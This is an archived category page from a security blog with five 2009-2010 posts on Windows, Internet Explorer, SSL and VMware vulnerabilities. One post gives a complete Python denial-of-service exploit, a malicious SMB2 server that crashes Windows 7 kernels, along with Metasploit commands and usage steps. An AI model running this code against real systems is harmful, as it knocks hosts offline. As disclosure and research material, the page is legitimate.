Archive for the ‘Exploits’ Category

« Older Pages

IE v.6,7,8 RCE && stack overflow in winhlp32 process (Windows XP SP3)

Thursday, February 25th, 2010

Introduction:
This vulnerability regards to invoke winhlp32.exe,the Microsoft Windows Help File viewer, from Internet Explorer 6,7,8 using VBScript. Passing malicious .HLP file to winhlp32 could allow remote attacker to run arbitrary command.
Additionally, there is a stack overflow vulnerability in winhlp32.exe.

Proof of Concept:
To trigger vulnerability some user interaction is needed. Victim has to press F1 when MsgBox popup is displayed.

1

MsgBox(prompt[,buttons][,title][,helpfile,context])

It is possible to pass remote samba share as helpfile parameter. In addition there is a stack based buffer overflow when helpfile parameter is too long. However, on XP winhlp32.exe is compiled with
/GS flag, which in this case effectively guard the stack.

Example of this exploiting.

Affected Systems:
Windows XP with Service Pack 3

Not Affected Systems:
Vista, Windows 7

Impact:
Value: MEDIUM
The vulnerability allows remote attacker to run arbitrary code on victim machine.

Related sources:
Isec Security Research

Tags: , , , , , , , , , , , ,
Posted in Articles, Exploits, Hacking, Infosecurity, PoC | No Comments »

Internet Explorer 6-7-8 => Remote Code Execution

Tuesday, January 19th, 2010

Summary:
Microsoft is investigating reports of limited, targeted attacks against customers of Internet Explorer 6, using a vulnerability in Internet Explorer.

Affected:
Internet Explorer 5.01 Service Pack 4 on Microsoft Windows 2000 Service Pack 4 is not affected, and that Internet Explorer 6 Service Pack 1 on Microsoft Windows 2000 Service Pack 4, and Internet Explorer 6, Internet Explorer 7 and Internet Explorer 8 on supported editions of Windows XP, Windows Server 2003, Windows Vista, Windows Server 2008, Windows 7, and Windows Server 2008 R2 are vulnerable.

Vulnerability:
The vulnerability exists as an invalid pointer reference within Internet Explorer. It is possible under certain conditions for the invalid pointer to be accessed after an object is deleted. In a specially-crafted attack, in attempting to access a freed object, Internet Explorer can be caused to allow remote code execution.
In a Web-based attack scenario, an attacker could host a Web site that contains a Web page that is used to exploit this vulnerability. In addition, compromised Web sites and Web sites that accept or host user-provided content or advertisements could contain specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to visit these Web sites. Instead, an attacker would have to convince users to visit the Web site, typically by getting them to click a link in an e-mail message or Instant Messenger message that takes users to the attacker’s Web site.
An attacker who successfully exploited this vulnerability could gain the same user rights as the local user. Users whose accounts are configured to have fewer user rights on the system could be less affected than users who operate with administrative user rights.

NOTE: This is the vulnerability used by China hackers to spy and scam Gmail Accounts.

Tags: , , , , , , , , ,
Posted in Articles, Exploits, Hacking, News | Comments Off

Windows 7 and Windows Server 2008 R2 Remote Kernel Crash Exploit

Monday, November 16th, 2009

Windows 7 and Windows Server 2008 R2 Remote Kernel Crash Exploit
Windows 7 and Windows Server 2008 R2, with the very latest patches applied, are affected of this vulnerability. A link to a server running this code could easily be embedded in a web page or email, pointing out to a poison host on the internet, so this exploit is not isolated to corporate networks doing file sharing. It’s tested on the affected operating systems, fully patched as of 12 Nov 2009.
This affects hosts whatever version of SMB they are running.
It has no mechanism for propagation, the vulnerability does not have the potential to steal information or compromise system integrity, but it crashes hosts ( IPv4 and IPv6 )

Exploiting
On a linux machine, ensure that port 445 is open or that your firewall is down and the target windows host and the linux host have connectivity, then python w7spolit.py. You need be root to open a tcp service, on the target Windows box, do a “net use x.x.x.x”, where x.x.x.x is the ip address of the linux box.

Proof of Concept (Sploit)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure()
caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast from the target: \\this_script_ip_addr\BLAH , instantly
crash
#Author: <a href="http://twitter.com/g_laurent">Laurent Gaffiè</a>
#
 
import SocketServer
 
packet = "\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"
 
 
class SMB2(SocketServer.BaseRequestHandler):
 
    def handle(self):
 
        print "Who:", self.client_address
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()
 
launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port
445
launch.serve_forever()
 
#SDL FAILED

Metasploit Module

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39

#
# Root access is needed to run a service on port 445
#
 
$ sudo msfconsole
 
         =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
         =[ svn r7470 updated today
 
msf > use auxiliary/dos/windows/smb/smb2_negotiate_response_loop 
msf auxiliary(smb2_negotiate_response_loop) > run
 
[*] Starting the malicious SMB service...
[*] To trigger, the vulnerable client should try to access: \\192.168.0.136\Shared\Anything
[*] Server started.
 
#
# MS09-065 PoC
#
 
$ msfconsole 
 
         =[ metasploit v3.3-rc1 [core:3.3 api:1.0]
+ -- --=[ 441 exploits - 216 auxiliary
+ -- --=[ 190 payloads - 21 encoders - 8 nops
         =[ svn r7470 updated today
 
msf > use auxiliary/dos/windows/browser/ms09_065_eot_integer 
msf auxiliary(ms09_065_eot_integer) > set URIPATH /eot
URIPATH => /eot
msf auxiliary(ms09_065_eot_integer) > run
 
[*] Using URL: http://0.0.0.0:8080/eot
[*]  Local IP: http://192.168.0.136:8080/eot
[*] Server started.
 
(send the target to http://A.B.C.D:8080/eot/)

Patch
There is no host based mitigation available. You have to not browse indiscriminately from your workstation and you can disable SMB service and ports.

Referers
FullDisclosure – Seclists
SANS Institute

Tags: , , , , , , , , , ,
Posted in Exploits, Hacking, Infosecurity, PoC, Webappsec, Windows | Comments Off

IE, Chrome, Safari SSL Insecurity

Saturday, October 24th, 2009

IE, Chrome, Safari SSL Insecurity
Ie,Chrome and Safari are not safe browsers to conduct money or confidential transactions, like PayPal, is more secure the Firefox alternative.

It has been published a secure sockets layer certificate that exploits a gaping hole in a Microsoft library used by all three of those browsers. Although the certificate is fraudulent, it appears to all three to be a completely legitimate credential vouching for the online payment service. The bug was disclosed more than nine weeks ago, but Microsoft has yet to fix it.
PayPal and thousands of other financial websites use the certificates to generate a digital signature that mathematically proves login pages aren’t forgeries that were set up by con artists who are sitting in between the user and the website he’s trying to view.
The certificate exploits a security hole in a Microsoft application programming interface known as the CryptoAPI, which is used by the IE, Google Chrome and Apple Safari for Windows browsers to parse a website’s SSL certificates. Even though the certificate is demonstrably forged, it can be used with a previously available hacking tool called SSLSniff to cause all three browsers to display a spoofed page with no warnings, even when its address begins with “https.”
The certificate is the latest to target a weakness that causes browsers, email clients, and other SSL-enabled apps to ignore all text following the \ and 0 characters, which are used to denote the end of a string of characters in C-based languages. Attackers can exploit that weakness by registering a normal SSL certificate for a site under their control and then inserting the domain name and the null character immediately following the name of the site they want to impersonate.

An example of this:

www.paypal.com\0ssl.secureconnection.cc

The take-away from all of this is that if you use IE, Chrome or Safari for Windows to browse SSL-protected parts of PayPal, there’s no way to know if they are genuine – at least until Microsoft gets around to fixing the bug. And because it’s entirely possible null-prefix certificates for other sites have been issued more quietly, there’s no way to rely on SSL at all for those browsers.

References:
Microsoft Security Bulletin
Black Hat Security
TheRegister Security

Tags: , , , , , ,
Posted in Articles, Exploits, Hacking, Webappsec | Comments Off

VMware multiple security issues and advisories

Sunday, October 18th, 2009

VMware multiple security issues and advisories
VMware ESX patches for DHCP, Service Console kernel, and JRE resolve multiple security issues.

Summary:
Updated DHCP and Kernel packages for ESX 3.5 and ESX 3.0.3 and updated Java JRE packages for ESX 3.5 address several security issues.

Service Console update for DHCP and third party library update for DHCP client.
A stack-based buffer overflow in the script_write_params method in ISC DHCP dhclient allows remote DHCP servers to execute arbitrary code via a crafted subnet-mask option.
An insecure temporary file use flaw was discovered in the DHCP daemon’s init script (“/etc/init.d/dhcpd”). A local attacker could use this flaw to overwrite an arbitrary file with the output of the
dhcpd -t” command via a symbolic link attack, if a system Administrator executed the DHCP init script with the “configtest“, “restart“, or “reload” option.

Updated Service Console package kernel
Service Console package kernel update to version kernel-2.4.21-58.EL.

JRE Security Update
JRE update to version 1.5.0_18, which addresses multiple security issues that existed in earlier releases of JRE.
Notes: These vulnerabilities can be exploited remotely only if the attacker has access to the Service Console network.

References:
The Common Vulnerabilities and Exposures project
WMware Lists

Tags: , , , , , ,
Posted in Bsd and *nix, Exploits, Hacking, Infosecurity, PoC | Comments Off

« Older Pages